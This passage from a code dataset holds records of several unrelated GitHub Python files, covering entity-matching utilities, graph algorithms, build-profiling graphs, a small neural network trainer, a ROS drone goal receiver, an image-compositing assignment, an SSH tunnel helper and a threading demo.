\n table = table[ ['ID'] + [ col for col in table.columns if col != 'ID' ] ]\n return table\n\n# Blackbox function for the blackbox blocker in Magellan.\ndef is_year_year(x, y):\n # x, y will be of type pandas series\n \n # get year attribute\n x = x['Year'] # Consists of multiple Years\n y = y['Year']\n\n x = x.split()\n\n if len(x) == 1:\n if x[0] == y:\n return False\n else:\n return True\n else:\n for year in x:\n if str(year) == str(y):\n return False\n return True\n\ndef ditto_reformater(data):\n columns = []\n values = []\n value_writer = \"\"\n sentence_order = 0\n table_order = 0\n table1 = pd.DataFrame()\n table2 = pd.DataFrame()\n table3 = pd.DataFrame()\n starting_row = True\n\n for line in data.splitlines():\n table_order = 0\n for side in line.split(\"\\t\"):\n for word in side.split(\" \"):\n if word == \"COL\":\n if value_writer != \"\" and value_writer != \" \":\n values.append(value_writer)\n elif not starting_row:\n values.append(float(\"NaN\"))\n else:\n starting_row = False\n read_column = True\n read_values = False\n elif word == \"VAL\":\n read_column = False\n read_values = True\n first_word = True\n value_writer = \"\"\n else:\n if read_column:\n columns.append(word)\n elif read_values:\n if first_word:\n value_writer = word\n first_word = False\n else:\n value_writer += \" \" + word\n values.append(value_writer)\n value_writer = \"\"\n starting_row = True\n res = dict(zip(columns, values))\n if sentence_order == 0:\n if table_order == 0:\n table1 = pd.DataFrame.from_dict([res])\n table_order = 1\n elif table_order == 1:\n table2 = pd.DataFrame.from_dict([res])\n table_order = 2\n elif table_order == 2:\n table3 = pd.DataFrame([word], columns=['Truth'])\n table_order = 0\n values = []\n sentence_order = sentence_order + 1\n else:\n if table_order == 0:\n table1 = table1.append(res, ignore_index=True)\n table_order = 1\n elif table_order == 1:\n table2 = table2.append(res, ignore_index=True)\n table_order = 2\n elif table_order == 2:\n table3 = table3.append({'Truth': word}, ignore_index=True)\n table_order = 0\n values = []\n \n table3[\"Truth\"] = pd.to_numeric(table3[\"Truth\"])\n return table1, table2, table3\n\ndef clean_ABV_value(table):\n new_values = []\n for row in table.itertuples():\n new_values.append(row[4].split(\"%\")[0] + \" %\")\n for i in range(0, len(new_values)):\n if \"-\" in new_values[i]:\n new_values[i] = \"-\"\n temp = pd.DataFrame(new_values, columns=[\"ABV\"])\n table['ABV'] = temp\n return table\n\ndef magellan_reformater(table):\n table_columns = list(table.columns)\n total_attr = len(table_columns) - 1\n half_attr = total_attr / 2\n\n\n ditto_formatted = \"\"\n for row in table.itertuples(False):\n value_writer = \"\"\n for i in range(0, half_attr):\n value_writer += \"COL \" + table_columns[i] + \" VAL \" + row[i] + \" \"\n value_writer += \"\\t\"\n for i in range(half_attr, total_attr):\n value_writer += \"COL \" + table_columns[i] + \" VAL \" + row[i] + \" \"\n value_writer += \"\\t\" + row[total_attr] + \"\\n\"\n ditto_formatted += value_writer\n\n return ditto_formatted\n\n# For careful data ensuring.\ndef ensure_data(table, alike = True, threshold = 0.8 ):\n table_columns = list(table.columns)\n total_attr = len(table_columns) - 1\n half_attr = int(total_attr / 2)\n\n\n new_df = pd.DataFrame()\n for row in table.itertuples(index=False):\n similarity_dict = dict()\n for i in range(0, half_attr):\n try:\n similarity_dict[i] = Levenshtein.ratio(row[i], row[half_attr+i])\n except TypeError:\n similarity_dict[i] = 1\n if alike:\n if 
all(x > threshold for x in similarity_dict.values()):\n temp = pd.Series(row, table_columns)\n new_df = new_df.append(temp, ignore_index=True)\n else:\n if all(x < threshold for x in similarity_dict.values()):\n temp = pd.Series(row, table_columns)\n new_df = new_df.append(temp, ignore_index=True)\n\n new_df.rename(columns = {'Index':'_id'}, inplace = True)\n return new_df","repo_name":"upforde/Idun","sub_path":"magellan/Notebooks/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5345112092","text":"'''The main difference here is that I don't pre-initialise the dictionaries'''\n\nfrom collections import deque\nfrom collections import defaultdict\n\n\ndef topo_sort(_, edges):\n adjacent = defaultdict(list)\n in_degrees = defaultdict(int)\n\n for parent, child in edges:\n in_degrees[child] += 1 \n adjacent[parent].append(child)\n\n sources = deque()\n \n # find the nodes with no parents\n for parent, _ in adjacent.items():\n if parent not in in_degrees:\n sources.append(parent)\n\n output = []\n\n while sources:\n source = sources.popleft()\n output.append(source)\n \n for child in adjacent[source]:\n in_degrees[child] -=1\n\n if in_degrees[child] == 0:\n sources.append(child)\n \n return output\n\n\nprint(topo_sort(5, [[4, 2], [4, 3], [2, 0], [2, 1], [3, 1]]))\nprint(topo_sort(7, [[6, 4], [6, 2], [5, 3], [5, 4], [3, 0], [3, 1], [3, 2], [4, 1]]))","repo_name":"codeybear/AlgoStuff","sub_path":"topological_sort/topological_sort_me.py","file_name":"topological_sort_me.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9406928644","text":"def minimumAbsoluteDifference(arr):\n # Write your code here\n arr.sort()\n print(arr)\n m=abs(arr[-1]-arr[0])\n \n for i in range(1,len(arr)):\n if arr[i]-arr[i-1]= snap_start:\n filepaths = np.flip(filepaths[:snap_start+1])\n haloids = np.flip(haloids[:snap_start+1])\n h1ids = np.flip(h1ids[:snap_start+1])\n \n # filepaths and haloids now go the \"right\" way, i.e. 
starts from start_snap and goes until z=0\n assert len(filepaths) == len(haloids)\n assert len(haloids) == len(h1ids)\n\n # we save the data as an .hdf5 file since this is meant for large datasets, so that should work pretty good\n output = run_tracking(sim, z0haloid, filepaths, haloids, h1ids)\n output.to_hdf('../../Data/tracked_stars.hdf5',key=f'{sim}_{z0haloid}')\n\n\n\n\n\n\n\n \n\n\n\n\n\n \n","repo_name":"hollisakins/Justice_League_Code","sub_path":"Analysis/RamPressure/particletracking_stars.py","file_name":"particletracking_stars.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20231768468","text":"# 문제 출처 : https://school.programmers.co.kr/learn/courses/30/lessons/42890\n\n\ndef solution(relation):\n col_len = len(relation[0])\n col_sets = get_col_sets(col_len)\n unique_col_set = get_unique_key(col_sets, relation)\n candidate_key = get_candidate_key(unique_col_set)\n\n return len(candidate_key)\n\n\ndef get_unique_key(col_sets, relation):\n\n return [col_set for col_set in col_sets if check_uniqueness(col_set, relation)]\n\n\ndef get_candidate_key(unique_col_set):\n unique_col_set.sort(key=lambda x: len(x))\n candidate_key = []\n\n for col_set in unique_col_set:\n if all([len(set(key) - set(col_set)) for key in candidate_key]):\n candidate_key.append(col_set)\n\n return candidate_key\n\n\ndef get_col_sets(col_len):\n col_sets = []\n\n for mask in range(1, 1 << col_len):\n select_col = list(bin(mask)[2:].zfill(col_len))\n col_set = [\n col_idx for col, col_idx in zip(select_col, range(col_len)) if col == \"1\"\n ]\n col_sets.append(col_set)\n\n return col_sets\n\n\n# itertools.combinations 모듈 이용\n# def get_col_sets(col_len):\n# from itertools import combinations\n\n# col_sets = []\n# for r in range(1, col_len + 1):\n# col_sets += list(combinations(range(col_len), r))\n\n# return col_sets\n\n\ndef check_uniqueness(col_set, relation):\n col_projection = []\n\n for row in relation:\n col_projection.append(tuple([row[col] for col in col_set]))\n\n return len(col_projection) == len(set(col_projection))\n","repo_name":"Su-minn/coding-test","sub_path":"Kakao_Problem/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1254851362","text":"import argparse\nimport json\nimport multiprocessing as mp\nimport os\nimport logging\nimport datetime\n\nfrom abc import ABCMeta, abstractmethod\n\nimport networkx as nx\nimport networkx.algorithms.dag as dag\n\nfrom makegrind.node import (\n TargetNode,\n BuildNode,\n BuildNodeInfoView,\n TargetNodeInfoView,\n)\nimport makegrind.reports as reports\n\n__all__ = [\"TargetDiGraph\", \"BuildDiGraph\"]\n\nlogger = logging.getLogger(__name__)\n\n\nclass MakeGrindDiGraph(nx.DiGraph, metaclass=ABCMeta):\n __cached__ = [\"_reduced\", \"_entry\"]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.clear()\n\n def clear(self):\n \"\"\"Clears cached attributes\"\"\"\n for x in self.__cached__:\n setattr(self, x, None)\n\n def nodekey(self, target):\n return self.node_attr_dict_factory.nodekey(target)\n\n @property\n @abstractmethod\n def node_info_view_factory(self):\n \"\"\"Class that generates a node info view\"\"\"\n return\n\n @property\n def info(self):\n return self.node_info_view_factory(self)\n\n @property\n def reduced(self):\n if self._reduced is None:\n self._reduced = 
dag.transitive_reduction(self)\n\n return self._reduced\n\n @property\n def entry(self):\n if self._entry is None:\n for node in dag.topological_sort(self):\n if self.nodes[node].valid:\n self._entry = node\n break\n else:\n raise mg_exceptions.TargetNotFoundError(\"Unable to find entry point\")\n\n return self.nodes[self._entry]\n\n def heaviest_child(self, node):\n return max(\n self.reduced.successors(node),\n key=lambda x: self.nodes[x].elapsed,\n default=None,\n )\n\n def heaviest_path(self, start=None):\n if start is None:\n start = self.entry.key\n\n while start:\n yield start\n start = self.heaviest_child(start)\n\n\nclass TargetDiGraph(MakeGrindDiGraph):\n node_attr_dict_factory = TargetNode\n node_info_view_factory = TargetNodeInfoView\n\n def add_target(self, target):\n key = self.nodekey(target)\n depends = target.pop(\"depends\", list())\n if key not in self.nodes:\n self.add_node(key)\n self.nodes[key].update(target)\n\n for dep in [{\"pid\": target[\"pid\"], \"name\": x} for x in depends]:\n self.add_edge(key, self.nodekey(dep))\n\n def add_nodes_from_build(self, build, targets):\n for target in targets:\n target[\"pid\"] = build.pid\n target[\"directory\"] = build.directory\n self.add_target(target)\n\n def add_parent_edges(self, build, parent):\n pkey = self.nodekey({\"pid\": parent[\"pid\"], \"name\": parent[\"target\"]})\n for entry in build.entry:\n self.add_edge(pkey, entry)\n self.nodes[pkey][\"recursive\"] = True\n\n @property\n def elapsed_recipe(self):\n return sum(\n (\n d.elapsed_recipe\n for d in self.info.values()\n if not d.get(\"recursive\", False)\n ),\n datetime.timedelta(),\n )\n\n\nclass BuildDiGraph(MakeGrindDiGraph):\n node_attr_dict_factory = BuildNode\n node_info_view_factory = BuildNodeInfoView\n\n def __init__(self):\n super().__init__()\n self.targets = TargetDiGraph()\n self._entry = None\n\n def update(self, edges=None, nodes=None):\n super().update(edges, nodes)\n if hasattr(edges, \"targets\"):\n self.targets.update(edges.targets)\n\n def relpath(self, path):\n \"\"\"Returns the path relative to the root directory of the graph\"\"\"\n if path is not None and path.startswith(\"/\"):\n path = os.path.relpath(path, self.prefix)\n\n if path == \".\":\n path = os.path.basename(self.prefix)\n\n return path\n\n @property\n def prefix(self):\n return self.entry.directory\n\n @staticmethod\n def node_name(pid, target):\n return \"{}:{}\".format(pid, target)\n\n @property\n def jobs(self):\n return self.entry.jobs\n\n @property\n def elapsed(self):\n return self.entry.elapsed\n\n @property\n def elapsed_recipe(self):\n return self.targets.elapsed_recipe\n\n def add_nodes_from_build(self, build):\n logger.debug(\"Adding build with pid: %s\", build[\"pid\"])\n targets = build.pop(\"targets\", list())\n key = self.nodekey(build)\n\n self.add_node(key, **build)\n\n self.targets.add_nodes_from_build(self.nodes[key], targets)\n\n if \"parent\" in build:\n self.add_edge(self.nodekey(build[\"parent\"]), key)\n self.targets.add_parent_edges(self.nodes[key], build[\"parent\"])\n\n @classmethod\n def from_remake(cls, json_path):\n \"\"\"Generate the graph from a json file output from remake\"\"\"\n\n logger.debug(\"Loading data from: %s\", json_path)\n try:\n with open(json_path) as fd:\n return cls.from_json(fd.read())\n except Exception as e:\n logger.error(\"Error loading json from '%s'\", json_path)\n raise e\n\n @classmethod\n def from_json(cls, json_str):\n \"\"\"Generate the graph from a json string\"\"\"\n return cls.from_build(json.loads(json_str))\n\n 
@classmethod\n def from_build(cls, build):\n graph = cls()\n graph.add_nodes_from_build(build)\n return graph\n","repo_name":"Arrowbox/makegrind","sub_path":"src/makegrind/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"2239821828","text":"import numpy as np\nimport math\nimport random\nimport copy\n\nALPHA = 0.2\nE = 0.01\n\n\ndef multiplication(matrix_1, matrix_2):\n matrix_1 = copy.deepcopy(matrix_1)\n matrix_2 = copy.deepcopy(matrix_2)\n transposed_matrix_2 = list(zip(*matrix_2))\n\n return [[sum(el1 * el2 for el1, el2 in zip(row_1, col_2)) for col_2 in transposed_matrix_2] for row_1 in matrix_1]\n\n\ndef ELU(x_input):\n if x_input >= 0:\n return x_input\n if x_input < 0:\n result = ALPHA * (math.exp(x_input) - 1)\n return result\n\n\ndef ELU_dif(x_input):\n if x_input > 0:\n return 1\n else:\n return ELU(x_input) + ALPHA\n\n\ndef sigma_func(x_input):\n return 1/(1 + math.exp((-1) * x_input))\n\n\ndef sigma_func_def(x_input):\n return sigma_func(x_input) * (1 - sigma_func(x_input))\n\n\ndef factorial(x_input):\n result = 1\n for i in range(1, x_input + 1):\n result *= i\n return result\n\n\ndef create_window(sequence, rows, columns):\n window = []\n for row in range(rows):\n new_row = []\n for col in range(columns):\n new_row.append(sequence[row + col])\n window.append(new_row)\n return window\n\n\ndef predict_next(W1, W2, line):\n input_layer = np.array(line + [0])\n hidden_layer = np.matmul(input_layer, W1)\n output_layer = np.matmul(hidden_layer, W2)\n result = math.fabs(output_layer[0])\n return result\n\n\nchoice = input(\"Выберите режим работы: 1 - обучение; !1 - предсказание: \")\nif choice == '1':\n X_choice = input(\"Выберите последовательность: \\n1 - ряд Фиббоначи\\n\"\n \"2 - факториальная функция\\n3 - периодическая функция\\n4 - степенная функция\\n\\n\")\n X_count = int(input(\"Выберите количество элементов в выбранной последовательности: \"))\n X = []\n if X_choice == '1':\n row_type = \"fib\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_fibonacci in range(2, X_count):\n X[index_of_fibonacci] = X[index_of_fibonacci - 1] + X[index_of_fibonacci - 2]\n print(X)\n if X_choice == '2':\n row_type = \"fac\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_factorial in range(X_count):\n X[index_of_factorial] = factorial(index_of_factorial + 1)\n print(X)\n if X_choice == '3':\n row_type = \"loop\"\n for index_of_primary_fill in range(X_count):\n if index_of_primary_fill % 2 == 0:\n X.append(1)\n else:\n X.append(0)\n print(X)\n if X_choice == '4':\n row_type = \"pow\"\n x_pow = int(input(\"Введите степень для степенной функции: \"))\n for index_of_pow_func in range(X_count):\n X.append(index_of_pow_func ** x_pow)\n print(X)\n\n E = float(input(\"Введите ошибку: \"))\n ALPHA = float(input(\"Введите коэффициент обучения: \"))\n L = int(input(\"Введите количество столбцов в матрице обучения: \"))\n # p = int(input(\"Введите количество строк в матрице обучения: \"))\n limit_of_iterations = int(input(\"Введите количество шагов обучения, которые может пройти сеть: \"))\n\n # L = 4\n p = len(X) - L - 1\n # limit_of_iterations = 1000\n number_of_neurons_on_hidden_layer = 5\n\n learning_window = create_window(X, p, L)\n contexts_list = []\n for adding_contexts in range(len(learning_window)):\n new_context = [0]\n contexts_list.append(new_context)\n\n W1 = []\n W2 = []\n\n # 
==================== ИНИЦИАЛИЗАЦИЯ ВЕСОВЫХ МАТРИЦ\n\n for init_w1_index_row in range(L + 1):\n new_row = []\n for init_w1_index_col in range(number_of_neurons_on_hidden_layer):\n weight = np.random.randn() / 10\n new_row.append(weight)\n W1.append(new_row)\n\n for init_w2_index_row in range(number_of_neurons_on_hidden_layer):\n weight = np.random.randn() / 10\n W2.append([weight])\n\n # ==================== ОБУЧЕНИЕ\n\n sum_err = E + 1\n current_iteration = 0\n while sum_err > E and current_iteration < limit_of_iterations:\n current_iteration += 1\n for sample_index in range(len(learning_window) - 1):\n input_layer = np.array(learning_window[sample_index] + contexts_list[sample_index])\n hidden_layer = np.matmul(input_layer, np.array(W1))\n for activating_index in range(len(hidden_layer)):\n hidden_layer[activating_index] = sigma_func(hidden_layer[activating_index])\n output_layer = np.matmul(hidden_layer, np.array(W2))\n output_layer[0] = sigma_func(output_layer[0])\n\n contexts_list[sample_index][0] = output_layer[0]\n\n intended_outcome = learning_window[sample_index + 1][L - 1]\n err = output_layer[0] - intended_outcome\n\n # ============ КОРРЕКТИРОВКА МАТРИЦ\n\n XT_W2T = np.matmul(np.array([input_layer]).T, np.array(W2).T)\n inactive_hidden_layer = np.matmul([input_layer], W1)\n deactivated_hidden_layer = []\n for deactivating_index in range(len(inactive_hidden_layer[0])):\n deactivated_hidden_layer.append(sigma_func_def(inactive_hidden_layer[0][deactivating_index]))\n Xt_W2T_DHL = np.array(multiplication(list(XT_W2T), [deactivated_hidden_layer]))\n\n for multiplying_index in range(len(Xt_W2T_DHL)):\n Xt_W2T_DHL[multiplying_index][0] *= ALPHA\n Xt_W2T_DHL[multiplying_index][0] *= err\n\n W1 = np.array(W1) - Xt_W2T_DHL\n\n deactivated_output_layer = [0]\n H_W2 = np.matmul(hidden_layer, W2)\n deactivated_output_layer[0] = sigma_func_def(H_W2[0])\n HL_DOL = np.matmul(np.array([hidden_layer]).T, np.array([deactivated_output_layer]))\n\n for multiplying_index in range(len(HL_DOL)):\n HL_DOL[multiplying_index] *= ALPHA\n HL_DOL[multiplying_index] *= err\n\n W2 = W2 - HL_DOL\n\n sum_err = 0\n for sample_index in range(len(learning_window) - 1):\n input_layer = np.array(learning_window[sample_index] + contexts_list[sample_index])\n hidden_layer = np.matmul(input_layer, np.array(W1))\n output_layer = np.matmul(hidden_layer, np.array(W2))\n\n contexts_list[sample_index][0] = output_layer[0]\n\n intended_outcome = learning_window[sample_index + 1][L - 1]\n err = output_layer[0] - intended_outcome\n sum_err += err ** 2\n print(\"Итерация \", current_iteration, \" \", sum_err)\n\n print(\"\\n\", str(predict_next(W1, W2, learning_window[-1])))\n\n with open(\"wm1\", 'w') as weight_matrix_file:\n np.save(\"wm1\", W1)\n with open(\"wm2\", 'w') as weight_matrix_file:\n np.save(\"wm2\", W2)\n\n # ==================================== всё остальное =======================================\n\nelse:\n W1 = np.array([])\n W2 = np.array([])\n with open(\"wm1.npy\", \"r\") as weight_matrix_file:\n W1 = np.load(\"wm1.npy\")\n with open(\"wm2.npy\", \"r\") as weight_matrix_file:\n W2 = np.load(\"wm2.npy\")\n\n X_choice = input(\"Выберите последовательность: \\n1 - ряд Фиббоначи\\n2 - Факториальная функция\\n\\n\")\n X_count = int(input(\"Выберите количество элементов в выбранной последовательности: \"))\n X = []\n row_type = \"\"\n if X_choice == '1':\n row_type = \"fib\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_fibonacci in range(2, X_count):\n X[index_of_fibonacci] = 
X[index_of_fibonacci - 1] + X[index_of_fibonacci - 2]\n print(X)\n if X_choice == '2':\n row_type = \"fac\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_factorial in range(X_count):\n X[index_of_factorial] = factorial(index_of_factorial + 1)\n print(X)\n\n learning_window = create_window(X, 7, 4)\n print(\"\\n\", str(predict_next(W1, W2, X[-5:-1])))\n","repo_name":"Nepare/MRZvIS_3_Jordan_Network","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31951907541","text":"#!/usr/bin/env python3\n# license removed for brevity\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import PoseStamped\nimport socket\nimport struct\nimport os\n\n\ndef talker():\n rospy.init_node('fly_recevier', anonymous=True)\n\n\n ip, port = rospy.get_param('~ardrone_ip'), rospy.get_param('~ardrone_port')\n x1, y1 = rospy.get_param('~x1'), rospy.get_param('~y1')\n x2, y2 = rospy.get_param('~x2'), rospy.get_param('~y2')\n x3, y3 = rospy.get_param('~x3'), rospy.get_param('~y3')\n\n\n tcp_server_socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM )\n address = (ip, port)\n tcp_server_socket.bind(address)\n tcp_server_socket.listen(128)\n client_socket, clientAddr = tcp_server_socket.accept()\n\n pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)\n\n\n rate = rospy.Rate(40)\n goal_msg = PoseStamped()\n recv_data_whole = bytes()\n \n while True:\n recv_data = client_socket.recv(struct.calcsize('i')+10)\n if len(recv_data) == 0 :\n client_socket.close()\n tcp_server_socket.close()\n print('finish')\n break\n else:\n recv_data_whole += recv_data\n\n if recv_data_whole.__len__() == struct.calcsize('i'):\n flag = struct.unpack('i',recv_data_whole)\n if flag == 0:\n os.system('roslaunch ego_planner single_run_in_exp.launch')\n if flag == 1:\n goal_msg.pose.position.x = x1\n goal_msg.pose.position.y = y1\n goal_msg.pose.position.z = 1.0\n elif flag == 2:\n goal_msg.pose.position.x = x2\n goal_msg.pose.position.y = y2\n goal_msg.pose.position.z = 1.0\n elif flag == 3:\n goal_msg.pose.position.x = x3\n goal_msg.pose.position.y = y3\n goal_msg.pose.position.z = 0.0\n\n goal_msg.header.frame_id = 'world'\n\n pub.publish( goal_msg )\n client_socket.send(\"ok\".encode('utf-8'))\n recv_data_whole = bytes()\n rate.sleep()\n \n \nif __name__ == '__main__':\n try:\n talker()\n except rospy.ROSInterruptException:\n pass","repo_name":"yonggaogit/covinsuwb","sub_path":"msg_utils/scripts/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14059227215","text":"\"\"\"\nFile: most_humorous_award.py\nAuthor:王偉誠\nID:0711506\n----------------------------------\nThis file creates a photoshopped image\nthat is going to compete for the 2019 Most\nHumorous Award for Introduction to Computer\nScience class in NCTUMSE.\nPlease put all the images you use in image_contest folder\nand make sure to choose which award you are aiming at\n\"\"\"\nfrom simpleimage import SimpleImage\n\n\ndef smaller(img):\n \"\"\"\n This method can change the size of the image.\n (make the image smaller.)\n \"\"\"\n blank = SimpleImage.blank(img.width // 2, img.height // 2)\n for x in range(blank.width):\n for y in range(blank.height):\n blank_pixel = blank.get_pixel(x, y)\n img_pixel = img.get_pixel(x * 2, y * 2)\n 
blank_pixel.red = img_pixel.red\n blank_pixel.green = img_pixel.green\n blank_pixel.blue = img_pixel.blue\n return blank\n\n\ndef no_green(img):\n \"\"\"\n This method will use the blank pixels to replace the green pixels in the image.\n \"\"\"\n blank = SimpleImage.blank(img.width, img.height)\n for x in range(img.width):\n for y in range(img.height):\n pixel = img.get_pixel(x, y)\n blank_pixel = blank.get_pixel(x, y)\n avg = (pixel.red + pixel.green + pixel.blue) // 3\n # find out the green pixels and change them to blank pixels.\n if pixel.green > avg > 40:\n pixel.red = blank_pixel.red\n pixel.green = blank_pixel.green\n pixel.blue = blank_pixel.blue\n return img\n\n\ndef blur(background):\n \"\"\"\n This method will smooth the background after making it bigger.\n \"\"\"\n blank = SimpleImage.blank(background.width, background.height)\n for x in range(blank.width):\n for y in range(blank.height):\n pixel = blank.get_pixel(x, y)\n if blank.width - 1 > x > 0 and blank.height - 1 > y > 0:\n sum_red = 0\n sum_green = 0\n sum_blue = 0\n # get the nearest pixels of the center pixel.\n for i in range(x - 1, x + 2):\n for j in range(y - 1, y + 2):\n old_9_pixel = background.get_pixel(i, j)\n sum_red += old_9_pixel.red\n sum_green += old_9_pixel.green\n sum_blue += old_9_pixel.blue\n # calculate the average RGB value of the 9 pixels.\n avg_red = sum_red // 9\n avg_green = sum_green // 9\n avg_blue = sum_blue // 9\n # change the RGB value of the center pixel.\n pixel.red = avg_red\n pixel.green = avg_green\n pixel.blue = avg_blue\n return blank\n\n\ndef bigger(background):\n \"\"\"\n This method can change the size of the background.\n (make the background bigger.)\n \"\"\"\n blank = SimpleImage.blank(background.width * 3, background.height * 3)\n for x in range(blank.width):\n for y in range(blank.height):\n blank_pixel = blank.get_pixel(x, y)\n background_pixel = background.get_pixel(x // 3, y // 3)\n blank_pixel.red = background_pixel.red\n blank_pixel.green = background_pixel.green\n blank_pixel.blue = background_pixel.blue\n return blank\n\n\ndef ps(img, background):\n \"\"\"\n This method will copy the img1 and paste it to the background,\n and the result will be funny.\n If it runs correctly, the face of img1 will be pasted to the board of the background.\n \"\"\"\n for x in range(0, background.width):\n for y in range(0, background.height):\n background_pixel = background.get_pixel(x, y)\n background_avg = (background_pixel.red + background_pixel.green + background_pixel.blue) // 3\n if img.width + 100 > x >= 100 and y < img.height:\n img_pixel = img.get_pixel(x - 100, y)\n img_avg = (img_pixel.red + img_pixel.green + img_pixel.blue) // 3\n if 225 > background_avg > 210 and img_avg < 255:\n background_pixel.red = img_pixel.red\n background_pixel.green = img_pixel.green\n background_pixel.blue = img_pixel.blue\n return background\n\n\ndef main():\n \"\"\"\n This program will copy the img1 without green pixels, and then\n paste it to the background.\n After running this program, The face of img1 will on the board of the background.\n \"\"\"\n background = SimpleImage(\"image_contest/background.jpg\")\n background = bigger(background)\n background = blur(background)\n img = SimpleImage(\"image_contest/img1.jpg\")\n img = no_green(img)\n img = smaller(img)\n final = ps(img, background)\n final.show()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"skyline9981/Introduction-to-Computers","sub_path":"Assignment4/Assignment4/most_humorous_award.py","file_name":"most_humorous_award.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18634653590","text":"from sshtunnel import SSHTunnelForwarder\nimport logging\n\n\ndef start_server(remote_user, remote_host, remote_port, local_host, local_port, private_key, gateway, config_file):\n \"\"\"\n Starting server for the tunnel from local to the given environment\n \"\"\"\n server = SSHTunnelForwarder(\n ssh_address_or_host=gateway,\n ssh_config_file=config_file,\n ssh_username=remote_user,\n ssh_private_key=private_key,\n remote_bind_address=(remote_host, int(remote_port)),\n local_bind_address=(local_host, int(local_port)),\n )\n\n server.start()\n logging.info(\"tunnel open now\")\n return server\n\n\ndef stop_server(server):\n \"\"\"\n Shutting tunnel down\n :param server:\n :return:\n \"\"\"\n server.stop()\n logging.info(\"tunnel closed\")\n","repo_name":"GoyalYatin/Python-Robot-Libraries","sub_path":"src/ssh_tunnel.py","file_name":"ssh_tunnel.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40959488076","text":"import threading, time\nfrom threading import Thread, Condition\n\ng_count = 0 # 전역변수는 자동으로 스레드의 공유자원이 됨\nlock = Condition() # 스레드 공유자원 접근에 제한을 강제하기 의한 잠금 객체\n\ndef threadCount(id,count):\n global g_count\n \n for i in range(count):\n lock.acquire()\n print('id %s==>count:%s, g_count:%s'%(id, i, g_count))\n g_count += 1\n lock.release()\n\nfor i in range(1,6):\n Thread(target = threadCount, args = (i, 5)).start()\n\ntime.sleep(1)\n\nprint('최종 g_count :', g_count)\nprint('bye')","repo_name":"LEESEUNGJUNE1/Python","sub_path":"pypro1/pack6network/test47lock.py","file_name":"test47lock.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44233917612","text":"\"\"\"\nScript: utils.py\nAuthor: chinmaib\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport math\n\ndef test1():\n x = np.random.randint(0,10,(5,5))\n print (x)\n\ndef calculate_MCC (cmat, n):\n \"\"\"\n Function calculates the Matthew's Correlation Coefficient for\n given confusion matrix cmat and total number of labels n.\n \"\"\" \n # True distribution of labels\n t_k = np.sum(cmat,axis=1)\n # Predicted distribution of labels\n p_k = np.sum(cmat,axis=0)\n #print (t_k)\n #print (p_k)\n # Total correctly predicted.\n # Sum of diagonal elements in the confusion matrix\n c = np.trace(cmat)\n print ('Correct c:',c)\n s = cmat.sum()\n s2 = s ** 2\n print ('Total s:',s)\n c_times_s = c * s\n sig_pk_times_tk = 0\n sig_pk2 = 0\n sig_tk2 = 0\n\n for i in range(0,n):\n temp = t_k[i] * p_k[i]\n sig_tk2 += t_k[i]**2\n sig_pk2 += p_k[i]**2\n\n sig_pk_times_tk += temp\n #print (temp)\n\n print ('Sum p_k times t_k:',sig_pk_times_tk)\n print ('s^2:',s2)\n print ('Sum t_k^2:',sig_tk2)\n print ('Sum p_k^2:',sig_pk2)\n\n MCC = ((c * s) - sig_pk_times_tk)/math.sqrt((s2 - sig_pk2)*(s2 - sig_tk2))\n print ('MCC:', MCC)\n\n","repo_name":"chinmaib/multitimescale","sub_path":"Study3_Analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33498404555","text":"import re\n\ndef 
